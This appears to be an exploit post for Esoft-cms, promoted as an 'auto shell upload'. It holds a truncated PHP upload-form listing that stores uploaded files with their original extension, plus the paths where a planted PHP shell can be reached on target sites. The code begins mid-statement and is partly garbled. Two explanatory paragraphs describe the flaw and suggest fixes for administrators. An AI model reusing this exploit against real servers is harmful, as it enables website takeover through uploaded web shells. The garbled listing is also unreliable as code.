
# Exploit Title: Exploiter Esoft-cms | AUTO SHELL UPLOAD |
# Google Dork: Use Your Brain :p
# Date: 13-08-2015
# Exploit Founded & Author: Matrix Dz
# Version: 1.1
# Tested on: Linux , Win 7 , XP , Mac OS

Here is the exploit code (please DON'T change the author :)

Note on the listing: it begins mid-statement, because the opening of the PHP block and the HTML form markup were lost when the page was extracted. In the part that survives, the size check only prints a message and does not stop processing (the comment says "exit" but no exit follows), and the stored name is built as $photo_name.'.'.$ext and passed to move_uploaded_file() with no extension or content-type check visible. The database fields are escaped, but the uploaded file itself is not validated in the visible code.

=$max_file_size){ echo "only the file less than ".$max_file_size."mb allowed to upload"; // exit the script by warning } $path=$photo_name.'.'.$ext; if(move_uploaded_file($file['tmp_name'],$upload_directory.$path)){ $uploadfile=$path; } else{ echo "The file cant moved to target directory."; //file can't moved with unknown reasons likr cleaning of server temperory files cleaning } } $slideshow_title=mysql_real_escape_string($_POST['sl_photo_caption']); $sl_url = mysql_real_escape_string($_POST['sl_url']); $position = mysql_real_escape_string($_POST['position']); $page = mysql_real_escape_string($_POST['page']); $insert="insert into slideshow(photo,slide_title,url,position,page) values ('$uploadfile','$slideshow_title','$sl_url','$position','$page')"; if(mysql_query($insert)){ echo ''; } else{ echo ''; } } ?>
Exploiter Esoft-cms | AUTO SHELL UPLOAD | exploit Founded And Author By Matrix Dz

Select Photo

Slide Caption
Slide position(home Page)
Slide position(Other Page)
'; } } ?>

Edit or Delete Photo


Si. No Preview Caption Page Action
Delete
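You can find the shell at www.host.com/mhcms-admin/images/slideshow/randomname.php OR www.host.com/esoft-cms/images/slideshow/randomname.php

That the uploaded file keeps a .php extension and is reachable under images/slideshow/ points to two gaps on the server side: the upload handler does not restrict extensions to an image allow-list, and the slideshow directory permits script execution. Administrators of affected installs should enforce an image-only allow-list (extension and content check) in the upload handler, disable PHP execution in the slideshow upload directories, and review those directories for files with script extensions.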